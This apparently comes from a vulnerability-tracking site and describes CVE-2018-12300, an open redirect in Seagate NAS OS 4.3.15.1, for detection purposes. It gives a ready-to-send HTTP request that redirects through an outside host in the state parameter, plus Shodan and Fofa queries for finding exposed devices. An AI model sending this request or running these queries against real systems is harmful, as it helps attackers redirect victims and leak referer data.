🔙 목록으로 돌아가기

CVE-2018-12300: Seagate NAS OS 4.3.15.1 - Open Redirect

TitleSeagate NAS OS 4.3.15.1 - Open Redirect
Author0x_Akoko
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could lead to user redirection to malicious websites, potentially resulting in the theft of sensitive information or the installation of malware.
RemediationApply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1.
CVSS Score6.1
EPSS Score0.20557
CVE IDCVE-2018-12300
CWE IDCWE-601
Shodan Queryhttp.title:"seagate nas - seagate"
Fofa Querytitle="seagate nas - seagate"
Tags cve2018 cve redirect seagate nasos vuln

🔍 Vulnerability Description

Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter.

🌐 HTTP Request

GET /echo-server.html?code=test&state=http://www.interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/6.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-12300.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-12300.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A